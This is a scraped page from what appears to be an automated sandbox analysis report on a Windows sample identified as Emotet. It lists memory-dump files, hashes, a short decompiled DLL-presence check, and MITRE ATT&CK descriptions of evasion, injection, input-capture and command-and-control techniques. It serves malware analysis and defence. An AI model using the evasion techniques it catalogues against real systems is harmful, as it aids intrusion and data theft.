Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #341
String ID: (B$@B
API String ID: 1595570120-3588368011
Opcode ID: ec75e1b5eeea7bd8747c664ab3925887fe3f167e07c4d82fb61ab10ee97e7b9e
Instruction ID: 9fc1a04d2e7c2c164a25ed8585c9de045f54167cbef22b7674d19ad04664b7df
Opcode Fuzzy Hash: ec75e1b5eeea7bd8747c664ab3925887fe3f167e07c4d82fb61ab10ee97e7b9e
Instruction Fuzzy Hash: 9EE045B1611B208F83A0DF2AA581642BAE0BF087103905E2F948BD3E11E774B4458F48

Uniqueness

Uniqueness Score: -1.00%

Function 00401519, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401519() {
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = LoadLibraryA("CWUCliFr.dll");
				if(_t1 == 0) {
					return 0;
				} else {
					FreeLibrary(_t1);
					_t4 = 1;
					return _t4;
				}
			}

0x0040cb43
0x0040cb4b
0x0040cb5a
0x0040cb4d
0x0040cb4e
0x0040cb56
0x0040cb57
0x0040cb57

APIs

LoadLibraryA.KERNEL32(CWUCliFr.dll), ref: 0040CB43
FreeLibrary.KERNEL32(00000000), ref: 0040CB4E

Strings

CWUCliFr.dll, xrefs: 0040CB3E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$FreeLoad
String ID: CWUCliFr.dll
API String ID: 534179979-2492026163
Opcode ID: f9bea487d67abad07a8603035380da5a5723ae06376e88bc064a27ec8db6fd80
Instruction ID: 2cf9ca0c468eac24318c7e19693b037b9fd6ce6e338a0f81386bb0908aaa771b
Opcode Fuzzy Hash: f9bea487d67abad07a8603035380da5a5723ae06376e88bc064a27ec8db6fd80
Instruction Fuzzy Hash: 37C08C7039120092EA002BB03D4EB0233246790742F1004B2B206E10C0CAB8D000A168

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 8U5snojV8p

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

Function 0040133E, Relevance: 1901.2, APIs: 813, Strings: 271, Instructions: 4157
windowCOMMON

Function 00407273, Relevance: 63.1, APIs: 10, Strings: 26, Instructions: 124
librarymemoryloaderCOMMON

Function 00401631, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 109
COMMON

Function 00426A4E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Function 004012F3, Relevance: 27.1, APIs: 18, Instructions: 88
filewindowCOMMON

Function 00420930, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 64
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre